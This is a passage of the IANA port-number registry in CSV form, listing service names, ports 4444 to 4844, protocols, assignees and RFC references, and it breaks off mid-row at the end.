krb524,4444,tcp,KRB524,[B_Clifford_Neuman],[B_Clifford_Neuman],,,,,"krb524 assigned the port, nv used it without an assignment", krb524,4444,udp,KRB524,[B_Clifford_Neuman],[B_Clifford_Neuman],,,,,"krb524 assigned the port, nv used it without an assignment", nv-video,4444,tcp,NV Video default,[Ron_Frederick],[Ron_Frederick],,,,,"krb524 assigned the port, nv used it without an assignment", nv-video,4444,udp,NV Video default,[Ron_Frederick],[Ron_Frederick],,,,,"krb524 assigned the port, nv used it without an assignment", upnotifyp,4445,tcp,UPNOTIFYP,[Mark_Fox],[Mark_Fox],,,,,, upnotifyp,4445,udp,UPNOTIFYP,[Mark_Fox],[Mark_Fox],,,,,, n1-fwp,4446,tcp,N1-FWP,,,,,,,, n1-fwp,4446,udp,N1-FWP,,,,,,,, n1-rmgmt,4447,tcp,N1-RMGMT,[Lori_Tassin],[Lori_Tassin],,,,,, n1-rmgmt,4447,udp,N1-RMGMT,[Lori_Tassin],[Lori_Tassin],,,,,, asc-slmd,4448,tcp,ASC Licence Manager,[Casper_Stoel],[Casper_Stoel],,,,,, asc-slmd,4448,udp,ASC Licence Manager,[Casper_Stoel],[Casper_Stoel],,,,,, privatewire,4449,tcp,PrivateWire,[Uri_Resnitzky],[Uri_Resnitzky],,,,,, privatewire,4449,udp,PrivateWire,[Uri_Resnitzky],[Uri_Resnitzky],,,,,, camp,4450,tcp,Common ASCII Messaging Protocol,[Control_Technology_Inc],[Clint_Eskew],,2011-10-28,,,, camp,4450,udp,Common ASCII Messaging Protocol,[Control_Technology_Inc],[Clint_Eskew],,2011-10-28,,,, ctisystemmsg,4451,tcp,CTI System Msg,[Control_Technology_Inc],[Clint_Eskew],,2011-10-28,,,, ctisystemmsg,4451,udp,CTI System Msg,[Control_Technology_Inc],[Clint_Eskew],,2011-10-28,,,, ctiprogramload,4452,tcp,CTI Program Load,[Control_Technology_Inc],[Clint_Eskew],,2011-10-28,,,, ctiprogramload,4452,udp,CTI Program Load,[Control_Technology_Inc],[Clint_Eskew],,2011-10-28,,,, nssalertmgr,4453,tcp,NSS Alert Manager,,,,,,,, nssalertmgr,4453,udp,NSS Alert Manager,,,,,,,, nssagentmgr,4454,tcp,NSS Agent Manager,[Jim_Hill],[Jim_Hill],,,,,, nssagentmgr,4454,udp,NSS Agent Manager,[Jim_Hill],[Jim_Hill],,,,,, prchat-user,4455,tcp,PR Chat User,,,,,,,, prchat-user,4455,udp,PR Chat User,,,,,,,, prchat-server,4456,tcp,PR Chat Server,,,,,,,, prchat-server,4456,udp,PR Chat Server,,,,,,,, prRegister,4457,tcp,PR Register,[Donny_Gilor],[Donny_Gilor],,,,,, prRegister,4457,udp,PR Register,[Donny_Gilor],[Donny_Gilor],,,,,, mcp,4458,tcp,Matrix Configuration Protocol,[Tim_DeBaillie],[Tim_DeBaillie],2006-12,,,,, mcp,4458,udp,Matrix Configuration Protocol,[Tim_DeBaillie],[Tim_DeBaillie],2006-12,,,,, ,4459-4483,,Unassigned,,,,,,,, hpssmgmt,4484,tcp,hpssmgmt service,[David_Straw],[David_Straw],2005-11,,,,, hpssmgmt,4484,udp,hpssmgmt service,[David_Straw],[David_Straw],2005-11,,,,, assyst-dr,4485,tcp,Assyst Data Repository Service,[Albert_Cester],[Albert_Cester],2008-08-26,,,,, ,4485,udp,Reserved,,,,,,,, icms,4486,tcp,Integrated Client Message Service,[Resource_Allocation],[Resource_Allocation],2010-09-27,,,,, icms,4486,udp,Integrated Client Message Service,[Resource_Allocation],[Resource_Allocation],2010-09-27,,,,, prex-tcp,4487,tcp,Protocol for Remote Execution over TCP,[Daniel_Ruppert],[Daniel_Ruppert],2010-09-16,,,,, ,4487,udp,Reserved,,,,,,,, awacs-ice,4488,tcp,Apple Wide Area Connectivity Service ICE Bootstrap,[Rory_McGuire],[Rory_McGuire],2010-09-24,,,,, awacs-ice,4488,udp,Apple Wide Area Connectivity Service ICE Bootstrap,[Rory_McGuire],[Rory_McGuire],2010-09-24,,,,, ,4489-4499,,Unassigned,,,,,,,Known UNAUTHORIZED USE: Ports 4490 and 4491, ipsec-nat-t,4500,tcp,IPsec NAT-Traversal,,,,,[RFC3947],,, ipsec-nat-t,4500,udp,IPsec NAT-Traversal,,,,,[RFC3947],,, ,4501,,Unassigned,[IANA],[IANA],,,,,,De-registered 08 June 2001 a25-fap-fgw,4502,sctp,A25 (FAP-FGW),[ThreeGPP2],[Zhiming_Li],2012-01-11,,,,, ,4503-4533,,Unassigned,,,,,,,, ,4534,tcp,Reserved,,,,,,,, armagetronad,4534,udp,Armagetron Advanced Game Server,[Manuel_Moos],[Yann_Kaiser],2012-11-02,,,,, ehs,4535,tcp,Event Heap Server,,,,,,,, ehs,4535,udp,Event Heap Server,,,,,,,, ehs-ssl,4536,tcp,Event Heap Server SSL,[Brad_Johanson],[Brad_Johanson],2005-08,,,,, ehs-ssl,4536,udp,Event Heap Server SSL,[Brad_Johanson],[Brad_Johanson],2005-08,,,,, wssauthsvc,4537,tcp,WSS Security Service,[Mark_Tirschwell],[Mark_Tirschwell],2006-01,,,,, wssauthsvc,4537,udp,WSS Security Service,[Mark_Tirschwell],[Mark_Tirschwell],2006-01,,,,, swx-gate,4538,tcp,Software Data Exchange Gateway,[Julien_VALIENTE],[Julien_VALIENTE],2006-05,,,,, swx-gate,4538,udp,Software Data Exchange Gateway,[Julien_VALIENTE],[Julien_VALIENTE],2006-05,,,,, ,4539-4544,,Unassigned,,,,,,,, worldscores,4545,tcp,WorldScores,[Steve_Davis],[Steve_Davis],,,,,, worldscores,4545,udp,WorldScores,[Steve_Davis],[Steve_Davis],,,,,, sf-lm,4546,tcp,SF License Manager (Sentinel),[Thomas_Koell],[Thomas_Koell],,,,,, sf-lm,4546,udp,SF License Manager (Sentinel),[Thomas_Koell],[Thomas_Koell],,,,,, lanner-lm,4547,tcp,Lanner License Manager,[Les_Enstone],[Les_Enstone],,,,,, lanner-lm,4547,udp,Lanner License Manager,[Les_Enstone],[Les_Enstone],,,,,, synchromesh,4548,tcp,Synchromesh,[Tom_Hawkins_2],[Tom_Hawkins_2],2006-02,,,,, synchromesh,4548,udp,Synchromesh,[Tom_Hawkins_2],[Tom_Hawkins_2],2006-02,,,,, aegate,4549,tcp,Aegate PMR Service,[Nick_Warrington],[Nick_Warrington],2006-03,,,,, aegate,4549,udp,Aegate PMR Service,[Nick_Warrington],[Nick_Warrington],2006-03,,,,, gds-adppiw-db,4550,tcp,Perman I Interbase Server,[Leo_Lesage],[Leo_Lesage],2006-04,,,,, gds-adppiw-db,4550,udp,Perman I Interbase Server,[Leo_Lesage],[Leo_Lesage],2006-04,,,,, ieee-mih,4551,tcp,MIH Services,,,,,[RFC5677],,, ieee-mih,4551,udp,MIH Services,,,,,[RFC5677],,, menandmice-mon,4552,tcp,Men and Mice Monitoring,[Carsten_Strotmann],[Carsten_Strotmann],2009-05-20,,,,, menandmice-mon,4552,udp,Men and Mice Monitoring,[Carsten_Strotmann],[Carsten_Strotmann],2009-05-20,,,,, icshostsvc,4553,tcp,ICS host services,[Gordan_Vosicki],[Gordan_Vosicki],2009-09-23,,,,, ,4553,udp,Reserved,,,,,,,, msfrs,4554,tcp,MS FRS Replication,[Kev_George],[Kev_George],2006-09,,,,, msfrs,4554,udp,MS FRS Replication,[Kev_George],[Kev_George],2006-09,,,,, rsip,4555,tcp,RSIP Port,,,,,[RFC3103],,, rsip,4555,udp,RSIP Port,,,,,[RFC3103],,, dtn-bundle,4556,tcp,DTN Bundle TCP CL Protocol,[Simon_Perreault],[Simon_Perreault],,2014-03-12,[RFC7242],,, dtn-bundle,4556,udp,DTN Bundle UDP CL Protocol,,,2006-11,2014-02-21,[RFC7122],,, dtn-bundle,4556,dccp,DTN Bundle DCCP CL Protocol,,,2013-11-12,2014-02-21,[RFC7122],1685351985,, ,4557,tcp,Reserved,,,,,,,, mtcevrunqss,4557,udp,Marathon everRun Quorum Service Server,[David_Schwartz_2],[David_Schwartz_2],2009-06-18,,,,, ,4558,tcp,Reserved,,,,,,,, mtcevrunqman,4558,udp,Marathon everRun Quorum Service Manager,[David_Schwartz_2],[David_Schwartz_2],2009-06-18,,,,, hylafax,4559,tcp,HylaFAX,[Lee_Howard],[Lee_Howard],2002-03,,,,, hylafax,4559,udp,HylaFAX,[Lee_Howard],[Lee_Howard],2002-03,,,,, ,4560-4562,,Unassigned,,,,,,,, amahi-anywhere,4563,tcp,Amahi Anywhere,[Amahi],[Carlos_Puchol],2014-02-27,,,,, ,4563,udp,Reserved,,,,,,,, ,4564-4565,,Unassigned,,,,,,,, kwtc,4566,tcp,Kids Watch Time Control Service,[Larry_Zarou],[Larry_Zarou],2006-10,,,,, kwtc,4566,udp,Kids Watch Time Control Service,[Larry_Zarou],[Larry_Zarou],2006-10,,,,, tram,4567,tcp,TRAM,[Joe_Wesley],[Joe_Wesley],,,,,, tram,4567,udp,TRAM,[Joe_Wesley],[Joe_Wesley],,,,,, bmc-reporting,4568,tcp,BMC Reporting,[Portnoy_Boxman],[Portnoy_Boxman],,,,,, bmc-reporting,4568,udp,BMC Reporting,[Portnoy_Boxman],[Portnoy_Boxman],,,,,, iax,4569,tcp,Inter-Asterisk eXchange,[Benjamin_Kowarsch],[Benjamin_Kowarsch],,,[RFC5456],,,"Defined TXT keys: auth plaintext | md5 | rsakeys userid alphanumeric, additionally '_', '+', '-' secret any printable ASCII characters domain any DNS domain name or IP address extension alphanumeric, additionally '*', '#', '_', '+', '-' context alphanumeric, additionally '_', '+', '-' trunk yes | no | 0 | 1 welcome alphanumeric, additionally '*', '#', '_', '+', '-' voicemail alphanumeric, additionally '*', '#', '_', '+', '-' reception alphanumeric, additionally '*', '#', '_', '+', '-' echotest alphanumeric, additionally '*', '#', '_', '+', '-' ivrtest alphanumeric, additionally '*', '#', '_', '+', '-' All of these TXT record keys are optional, they may be omitted. Further keys may be added in the future." iax,4569,udp,Inter-Asterisk eXchange,[Benjamin_Kowarsch],[Benjamin_Kowarsch],,,[RFC5456],,,"Defined TXT keys: auth plaintext | md5 | rsakeys userid alphanumeric, additionally '_', '+', '-' secret any printable ASCII characters domain any DNS domain name or IP address extension alphanumeric, additionally '*', '#', '_', '+', '-' context alphanumeric, additionally '_', '+', '-' trunk yes | no | 0 | 1 welcome alphanumeric, additionally '*', '#', '_', '+', '-' voicemail alphanumeric, additionally '*', '#', '_', '+', '-' reception alphanumeric, additionally '*', '#', '_', '+', '-' echotest alphanumeric, additionally '*', '#', '_', '+', '-' ivrtest alphanumeric, additionally '*', '#', '_', '+', '-' All of these TXT record keys are optional, they may be omitted. Further keys may be added in the future." deploymentmap,4570,tcp,Service to distribute and update within a site deployment information for Oracle Communications Suite,[Oracle_3],[Dan_Newman],2013-09-20,,,,, ,4570,udp,Reserved,,,,,,,, ,4571-4589,,Unassigned,,,,,,,, rid,4590,tcp,RID over HTTP/TLS,[IESG],[IETF_Chair],,,[RFC6546],,, ,4590,udp,Reserved,,,,,,,, l3t-at-an,4591,tcp,HRPD L3T (AT-AN),[Avi_Lior],[Avi_Lior],2009-02-27,,,,, l3t-at-an,4591,udp,HRPD L3T (AT-AN),[Avi_Lior],[Avi_Lior],2009-02-27,,,,, ,4592,tcp,Reserved,,,,,,,, hrpd-ith-at-an,4592,udp,HRPD-ITH (AT-AN),[David_Ott],[David_Ott],2008-06-05,,,,, ipt-anri-anri,4593,tcp,IPT (ANRI-ANRI),,,,,,,, ipt-anri-anri,4593,udp,IPT (ANRI-ANRI),,,,,,,, ias-session,4594,tcp,IAS-Session (ANRI-ANRI),,,,,,,, ias-session,4594,udp,IAS-Session (ANRI-ANRI),,,,,,,, ias-paging,4595,tcp,IAS-Paging (ANRI-ANRI),,,,,,,, ias-paging,4595,udp,IAS-Paging (ANRI-ANRI),,,,,,,, ias-neighbor,4596,tcp,IAS-Neighbor (ANRI-ANRI),[David_Ott],[David_Ott],2007-07-31,,,,, ias-neighbor,4596,udp,IAS-Neighbor (ANRI-ANRI),[David_Ott],[David_Ott],2007-07-31,,,,, a21-an-1xbs,4597,tcp,A21 (AN-1xBS),[David_Ott],[David_Ott],2006-02,,,,, a21-an-1xbs,4597,udp,A21 (AN-1xBS),[David_Ott],[David_Ott],2006-02,,,,, a16-an-an,4598,tcp,A16 (AN-AN),[David_Ott],[David_Ott],2005-12,,,,, a16-an-an,4598,udp,A16 (AN-AN),[David_Ott],[David_Ott],2005-12,,,,, a17-an-an,4599,tcp,A17 (AN-AN),[David_Ott],[David_Ott],2006-02,,,,, a17-an-an,4599,udp,A17 (AN-AN),[David_Ott],[David_Ott],2006-02,,,,, piranha1,4600,tcp,Piranha1,,,,,,,, piranha1,4600,udp,Piranha1,,,,,,,, piranha2,4601,tcp,Piranha2,[Primark_Corporation],[Primark_Corporation],,,,,, piranha2,4601,udp,Piranha2,[Primark_Corporation],[Primark_Corporation],,,,,, mtsserver,4602,tcp,EAX MTS Server,[Pedro_A_Rodriguez],[Pedro_A_Rodriguez],2008-08-06,,,,, ,4602,udp,Reserved,,,,,,,, menandmice-upg,4603,tcp,Men & Mice Upgrade Agent,[Eggert_Thorlacius_2],[Eggert_Thorlacius_2],2010-01-27,,,,, ,4603,udp,Reserved,,,,,,,, irp,4604,tcp,Identity Registration Protocol,[Sixscape_Communications_Ltd],[Lawrence_E._Hughes],2014-03-17,,,,, ,4604,udp,Reserved,,,,,,,, ,4605-4657,,Unassigned,,,,,,,, playsta2-app,4658,tcp,PlayStation2 App Port,,,,,,,, playsta2-app,4658,udp,PlayStation2 App Port,,,,,,,, playsta2-lob,4659,tcp,PlayStation2 Lobby Port,[Noam_Rimon],[Noam_Rimon],2004-12,,,,, playsta2-lob,4659,udp,PlayStation2 Lobby Port,[Noam_Rimon],[Noam_Rimon],2004-12,,,,, smaclmgr,4660,tcp,smaclmgr,[Hiromi_Taki],[Hiromi_Taki],,,,,, smaclmgr,4660,udp,smaclmgr,[Hiromi_Taki],[Hiromi_Taki],,,,,, kar2ouche,4661,tcp,Kar2ouche Peer location service,[Andy_Krouwel],[Andy_Krouwel],,,,,, kar2ouche,4661,udp,Kar2ouche Peer location service,[Andy_Krouwel],[Andy_Krouwel],,,,,, oms,4662,tcp,OrbitNet Message Service,[Roy_Davies],[Roy_Davies],2005-08,,,,, oms,4662,udp,OrbitNet Message Service,[Roy_Davies],[Roy_Davies],2005-08,,,,, noteit,4663,tcp,Note It! Message Service,[Pedro_Alpedrinha],[Pedro_Alpedrinha],2006-02,,,,, noteit,4663,udp,Note It! Message Service,[Pedro_Alpedrinha],[Pedro_Alpedrinha],2006-02,,,,, ems,4664,tcp,Rimage Messaging Server,[David_V_Raskin],[David_V_Raskin],2006-02,,,,, ems,4664,udp,Rimage Messaging Server,[David_V_Raskin],[David_V_Raskin],2006-02,,,,, contclientms,4665,tcp,Container Client Message Service,[Bruce_Thompson],[Bruce_Thompson],2006-02,,,,, contclientms,4665,udp,Container Client Message Service,[Bruce_Thompson],[Bruce_Thompson],2006-02,,,,, eportcomm,4666,tcp,E-Port Message Service,,,,,,,, eportcomm,4666,udp,E-Port Message Service,,,,,,,, mmacomm,4667,tcp,MMA Comm Services,,,,,,,, mmacomm,4667,udp,MMA Comm Services,,,,,,,, mmaeds,4668,tcp,MMA EDS Service,[Robert_Shaffer],[Robert_Shaffer],2006-02,,,,, mmaeds,4668,udp,MMA EDS Service,[Robert_Shaffer],[Robert_Shaffer],2006-02,,,,, eportcommdata,4669,tcp,E-Port Data Service,[Robert_Shaffer],[Robert_Shaffer],2006-02,,,,, eportcommdata,4669,udp,E-Port Data Service,[Robert_Shaffer],[Robert_Shaffer],2006-02,,,,, light,4670,tcp,Light packets transfer protocol,[Adam_Golovenko],[Adam_Golovenko],2006-10,,,,, light,4670,udp,Light packets transfer protocol,[Adam_Golovenko],[Adam_Golovenko],2006-10,,,,, acter,4671,tcp,Bull RSF action server,[Christian_Caudrelier],[Christian_Caudrelier],2006-02,,,,, acter,4671,udp,Bull RSF action server,[Christian_Caudrelier],[Christian_Caudrelier],2006-02,,,,, rfa,4672,tcp,remote file access server,,,,,,,, rfa,4672,udp,remote file access server,,,,,,,, cxws,4673,tcp,CXWS Operations,[Phil_Abercrombie],[Phil_Abercrombie],2005-08,,,,, cxws,4673,udp,CXWS Operations,[Phil_Abercrombie],[Phil_Abercrombie],2005-08,,,,, appiq-mgmt,4674,tcp,AppIQ Agent Management,[Phil_Abercrombie],[Phil_Abercrombie],2005-08,,,,, appiq-mgmt,4674,udp,AppIQ Agent Management,[Phil_Abercrombie],[Phil_Abercrombie],2005-08,,,,, dhct-status,4675,tcp,BIAP Device Status,,,,,,,, dhct-status,4675,udp,BIAP Device Status,,,,,,,, dhct-alerts,4676,tcp,BIAP Generic Alert,[Louis_Slothouber],[Louis_Slothouber],2005-08,,,,, dhct-alerts,4676,udp,BIAP Generic Alert,[Louis_Slothouber],[Louis_Slothouber],2005-08,,,,, bcs,4677,tcp,Business Continuity Servi,[Siew_Sim],[Siew_Sim],2005-08,,,,, bcs,4677,udp,Business Continuity Servi,[Siew_Sim],[Siew_Sim],2005-08,,,,, traversal,4678,tcp,boundary traversal,[Kevin_Lu],[Kevin_Lu],2005-08,,,,, traversal,4678,udp,boundary traversal,[Kevin_Lu],[Kevin_Lu],2005-08,,,,, mgesupervision,4679,tcp,MGE UPS Supervision,,,,,,,, mgesupervision,4679,udp,MGE UPS Supervision,,,,,,,, mgemanagement,4680,tcp,MGE UPS Management,[Lecuivre_J],[Lecuivre_J],2005-08,,,,, mgemanagement,4680,udp,MGE UPS Management,[Lecuivre_J],[Lecuivre_J],2005-08,,,,, parliant,4681,tcp,Parliant Telephony System,[Colin_Henein],[Colin_Henein],2005-08,,,,, parliant,4681,udp,Parliant Telephony System,[Colin_Henein],[Colin_Henein],2005-08,,,,, finisar,4682,tcp,finisar,[Christina_Mercier],[Christina_Mercier],2005-08,,,,, finisar,4682,udp,finisar,[Christina_Mercier],[Christina_Mercier],2005-08,,,,, spike,4683,tcp,Spike Clipboard Service,[Scott_Herscher],[Scott_Herscher],2005-08,,,,, spike,4683,udp,Spike Clipboard Service,[Scott_Herscher],[Scott_Herscher],2005-08,,,,, rfid-rp1,4684,tcp,RFID Reader Protocol 1.0,[Michael_Mealling_2],[Michael_Mealling_2],2005-08,,,,, rfid-rp1,4684,udp,RFID Reader Protocol 1.0,[Michael_Mealling_2],[Michael_Mealling_2],2005-08,,,,, autopac,4685,tcp,Autopac Protocol,[Peter_Hallenbeck],[Peter_Hallenbeck],2005-08,,,,, autopac,4685,udp,Autopac Protocol,[Peter_Hallenbeck],[Peter_Hallenbeck],2005-08,,,,, msp-os,4686,tcp,Manina Service Protocol,[Markus_Nix],[Markus_Nix],2005-08,,,,, msp-os,4686,udp,Manina Service Protocol,[Markus_Nix],[Markus_Nix],2005-08,,,,, nst,4687,tcp,Network Scanner Tool FTP,[Mala_Bhat],[Mala_Bhat],2005-08,,,,, nst,4687,udp,Network Scanner Tool FTP,[Mala_Bhat],[Mala_Bhat],2005-08,,,,, mobile-p2p,4688,tcp,Mobile P2P Service,[Hanz_Hager],[Hanz_Hager],2008-12-04,,,,, mobile-p2p,4688,udp,Mobile P2P Service,[Hanz_Hager],[Hanz_Hager],2008-12-04,,,,, altovacentral,4689,tcp,Altova DatabaseCentral,[Altova],[Altova],2005-08,,,,, altovacentral,4689,udp,Altova DatabaseCentral,[Altova],[Altova],2005-08,,,,, prelude,4690,tcp,Prelude IDS message proto,[Yoann_Vandoorselaere],[Yoann_Vandoorselaere],2005-08,,,,, prelude,4690,udp,Prelude IDS message proto,[Yoann_Vandoorselaere],[Yoann_Vandoorselaere],2005-08,,,,, mtn,4691,tcp,monotone Netsync Protocol,[Thomas_Keller],[Thomas_Keller],2010-12-22,,,,, mtn,4691,udp,monotone Netsync Protocol,[Thomas_Keller],[Thomas_Keller],2010-12-22,,,,, conspiracy,4692,tcp,Conspiracy messaging,[Jens_Edlund],[Jens_Edlund],2005-08,,,,, conspiracy,4692,udp,Conspiracy messaging,[Jens_Edlund],[Jens_Edlund],2005-08,,,,, ,4693-4699,,Unassigned,,,,,,,, netxms-agent,4700,tcp,NetXMS Agent,,,,,,,, netxms-agent,4700,udp,NetXMS Agent,,,,,,,, netxms-mgmt,4701,tcp,NetXMS Management,,,,,,,, netxms-mgmt,4701,udp,NetXMS Management,,,,,,,, netxms-sync,4702,tcp,NetXMS Server Synchronization,[Victor_Kirhenshtein],[Victor_Kirhenshtein],2006-07,,,,, netxms-sync,4702,udp,NetXMS Server Synchronization,[Victor_Kirhenshtein],[Victor_Kirhenshtein],2006-07,,,,, npqes-test,4703,tcp,Network Performance Quality Evaluation System Test Service,[Zhengli],[Zhengli],2010-06-28,,,,, ,4703,udp,Reserved,,,,,,,, assuria-ins,4704,tcp,Assuria Insider,[Nick_Connor],[Nick_Connor],2010-06-30,,,,, ,4704,udp,Reserved,,,,,,,, ,4705-4724,,Unassigned,,,,,,,, truckstar,4725,tcp,TruckStar Service,[Brian_Toothill],[Brian_Toothill],2010-10-15,,,,, truckstar,4725,udp,TruckStar Service,[Brian_Toothill],[Brian_Toothill],2010-10-15,,,,, ,4726,tcp,Reserved,,,,,,,, a26-fap-fgw,4726,udp,A26 (FAP-FGW),[David_Ott],[David_Ott],2010-10-15,,,,, fcis,4727,tcp,F-Link Client Information Service,,,,,,,, fcis-disc,4727,udp,F-Link Client Information Service Discovery,[Makoto_Zukawa],[Makoto_Zukawa],2010-10-15,,,,, capmux,4728,tcp,CA Port Multiplexer,[Nigel_Groves],[Nigel_Groves],2006-06,,,,, capmux,4728,udp,CA Port Multiplexer,[Nigel_Groves],[Nigel_Groves],2006-06,,,,, ,4729,tcp,Reserved,,,,,,,, gsmtap,4729,udp,GSM Interface Tap,[Harald_Welte],[Harald_Welte],2009-01-16,,,,, gearman,4730,tcp,Gearman Job Queue System,[Eric_Day],[Eric_Day],2009-01-16,,,,, gearman,4730,udp,Gearman Job Queue System,[Eric_Day],[Eric_Day],2009-01-16,,,,, remcap,4731,tcp,Remote Capture Protocol,[Marc_Donner],[Marc_Donner],2009-01-16,,,,, ,4731,udp,Reserved,,,,,,,, ,4732,tcp,Reserved,,,,,,,, ohmtrigger,4732,udp,OHM server trigger,[Franck_Lefevre],[Franck_Lefevre],2009-11-18,,,,, resorcs,4733,tcp,RES Orchestration Catalog Services,[Bob_Janssen_2],[Bob_Janssen_2],2009-11-18,,,,, ,4733,udp,Reserved,,,,,,,, ,4734-4736,,Unassigned,,,,,,,, ipdr-sp,4737,tcp,IPDR/SP,[Ken_Sarno],[Ken_Sarno],2005-08,,,,, ipdr-sp,4737,udp,IPDR/SP,[Ken_Sarno],[Ken_Sarno],2005-08,,,,, solera-lpn,4738,tcp,SoleraTec Locator,[Mark_Armstrong],[Mark_Armstrong],2005-12,,,,, solera-lpn,4738,udp,SoleraTec Locator,[Mark_Armstrong],[Mark_Armstrong],2005-12,,,,, ipfix,4739,tcp,IP Flow Info Export,[Nevil_Brownlee],[Nevil_Brownlee],2005-08,,,,, ipfix,4739,udp,IP Flow Info Export,[Nevil_Brownlee],[Nevil_Brownlee],2005-08,,,,, ipfix,4739,sctp,IP Flow Info Export,[Nevil_Brownlee],[Nevil_Brownlee],2006-01,,,,, ipfixs,4740,tcp,ipfix protocol over TLS,[Nevil_Brownlee],[Nevil_Brownlee],2006-10,,,,, ipfixs,4740,sctp,ipfix protocol over DTLS,[Nevil_Brownlee],[Nevil_Brownlee],2006-10,,,,, ipfixs,4740,udp,ipfix protocol over DTLS,[Nevil_Brownlee],[Nevil_Brownlee],2006-10,,,,, lumimgrd,4741,tcp,Luminizer Manager,[George_Hwa],[George_Hwa],2007-03,,,,, lumimgrd,4741,udp,Luminizer Manager,[George_Hwa],[George_Hwa],2007-03,,,,, sicct,4742,tcp,SICCT,,,,,,,, sicct-sdp,4742,udp,SICCT Service Discovery Protocol,[TeleTrusT_Deutschlan],[TeleTrusT_Deutschlan],2006-04,,,,, openhpid,4743,tcp,openhpi HPI service,[Thomas_Kanngieser],[Thomas_Kanngieser],2006-01,,,,, openhpid,4743,udp,openhpi HPI service,[Thomas_Kanngieser],[Thomas_Kanngieser],2006-01,,,,, ifsp,4744,tcp,Internet File Synchronization Protocol,[Alex_White],[Alex_White],2007-09-12,,,,, ifsp,4744,udp,Internet File Synchronization Protocol,[Alex_White],[Alex_White],2007-09-12,,,,, fmp,4745,tcp,Funambol Mobile Push,[Andrea_Gazzaniga],[Andrea_Gazzaniga],2007-01,,,,, fmp,4745,udp,Funambol Mobile Push,[Andrea_Gazzaniga],[Andrea_Gazzaniga],2007-01,,,,, ,4746,,Unassigned,,,,,,,, buschtrommel,4747,udp,peer-to-peer file exchange protocol,[None],[Tobias_Sturm],2013-01-14,,,,, ,4747,tcp,Reserved,,,,,,,, ,4748-4748,,Unassigned,,,,,,,, profilemac,4749,tcp,Profile for Mac,[David_Sinclair],[David_Sinclair],2006-05,,,,, profilemac,4749,udp,Profile for Mac,[David_Sinclair],[David_Sinclair],2006-05,,,,, ssad,4750,tcp,Simple Service Auto Discovery,[Dr_Horst_Herb],[Dr_Horst_Herb],2005-12,,,,, ssad,4750,udp,Simple Service Auto Discovery,[Dr_Horst_Herb],[Dr_Horst_Herb],2005-12,,,,, spocp,4751,tcp,Simple Policy Control Protocol,[Roland_Hedberg_2],[Roland_Hedberg_2],2005-08,,,,, spocp,4751,udp,Simple Policy Control Protocol,[Roland_Hedberg_2],[Roland_Hedberg_2],2005-08,,,,, snap,4752,tcp,Simple Network Audio Protocol,[Dameon_Wagner],[Dameon_Wagner],2002-02,,,,, snap,4752,udp,Simple Network Audio Protocol,[Dameon_Wagner],[Dameon_Wagner],2002-02,,,,, simon,4753,tcp,Simple Invocation of Methods Over Network (SIMON),[Alexander_Christian],[Alexander_Christian],2012-04-19,,,,, simon-disc,4753,udp,Simple Invocation of Methods Over Network (SIMON) Discovery,[Alexander_Christian],[Alexander_Christian],2012-04-19,,,,, ,4754-4783,,Unassigned,,,,,,,, bfd-multi-ctl,4784,tcp,BFD Multihop Control,[Dave_Katz][Dave_Ward],[Dave_Katz][Dave_Ward],2006-02,,,,, bfd-multi-ctl,4784,udp,BFD Multihop Control,[Dave_Katz][Dave_Ward],[Dave_Katz][Dave_Ward],2006-02,,,,, ,4785,tcp,Reserved,,,,,,,, cncp,4785,udp,Cisco Nexus Control Protocol,[Joseph_Swaminathan],[Joseph_Swaminathan],2009-04-01,,,,, smart-install,4786,tcp,Smart Install Service,[Amit_Nigam],[Amit_Nigam],2009-08-24,,,,, ,4786,udp,Reserved,,,,,,,, sia-ctrl-plane,4787,tcp,Service Insertion Architecture (SIA) Control-Plane,[Shree_Murthy],[Shree_Murthy],2009-10-29,,,,, ,4787,udp,Reserved,,,,,,,, xmcp,4788,tcp,eXtensible Messaging Client Protocol,[Cisco],[Glenn_Matthews],2011-05-23,2011-10-25,,,,"Defined TXT keys: txtvers=1 (as described in the draft) protovers= (examples: ""protovers=1.0"" ""protovers=1.1,2.0""" ,4788,udp,Reserved,,,,,,,, vxlan,4789,udp,Virtual eXtensible Local Area Network (VXLAN),[Lawrence_Kreeger],[Lawrence_Kreeger],2013-04-19,2014-06-17,[RFC-mahalingam-dutt-dcops-vxlan-09],,, ,4789,tcp,Reserved,,,,,,,, ,4790-4799,,Unassigned,,,,,,,, iims,4800,tcp,Icona Instant Messenging System,,,,,,,, iims,4800,udp,Icona Instant Messenging System,,,,,,,, iwec,4801,tcp,Icona Web Embedded Chat,,,,,,,, iwec,4801,udp,Icona Web Embedded Chat,,,,,,,, ilss,4802,tcp,Icona License System Server,[Paul_Stephen_Borlie],[Paul_Stephen_Borlie],,,,,, ilss,4802,udp,Icona License System Server,[Paul_Stephen_Borlie],[Paul_Stephen_Borlie],,,,,, notateit,4803,tcp,Notateit Messaging,,,,,,,, notateit-disc,4803,udp,Notateit Messaging Discovery,[Ean_Black],[Ean_Black],2009-04-08,,,,, ,4804,tcp,Reserved,,,,,,,, aja-ntv4-disc,4804,udp,AJA ntv4 Video System Discovery,[Mike_Bernadett],[Mike_Bernadett],2010-06-03,,,,, ,4805-4826,,Unassigned,,,,,,,, htcp,4827,tcp,HTCP,[Paul_Vixie],[Paul_Vixie],,,,,, htcp,4827,udp,HTCP,[Paul_Vixie],[Paul_Vixie],,,,,, ,4828-4836,,Unassigned,,,,,,,, varadero-0,4837,tcp,Varadero-0,,,,,,,, varadero-0,4837,udp,Varadero-0,,,,,,,, varadero-1,4838,tcp,Varadero-1,,,,,,,, varadero-1,4838,udp,Varadero-1,,,,,,,, varadero-2,4839,tcp,Varadero-2,[Carlos_Arteaga],[Carlos_Arteaga],,,,,, varadero-2,4839,udp,Varadero-2,[Carlos_Arteaga],[Carlos_Arteaga],,,,,, opcua-tcp,4840,tcp,OPC UA TCP Protocol,,,,,,,, opcua-udp,4840,udp,OPC UA TCP Protocol,[Randy_Armstrong],[Randy_Armstrong],2006-09,,,,, quosa,4841,tcp,QUOSA Virtual Library Service,[Uri_Blank],[Uri_Blank],2006-09,,,,, quosa,4841,udp,QUOSA Virtual Library Service,[Uri_Blank],[Uri_Blank],2006-09,,,,, gw-asv,4842,tcp,nCode ICE-flow Library AppServer,[Ross_Swithenbank],[Ross_Swithenbank],2006-09,,,,, gw-asv,4842,udp,nCode ICE-flow Library AppServer,[Ross_Swithenbank],[Ross_Swithenbank],2006-09,,,,, opcua-tls,4843,tcp,OPC UA TCP Protocol over TLS/SSL,[Randy_Armstrong],[Randy_Armstrong],2006-09,,,,, opcua-tls,4843,udp,OPC UA TCP Protocol over TLS/SSL,[Randy_Armstrong],[Randy_Armstrong],2006-09,,,,, gw-log,4844,tcp,nCode ICE-flow Library 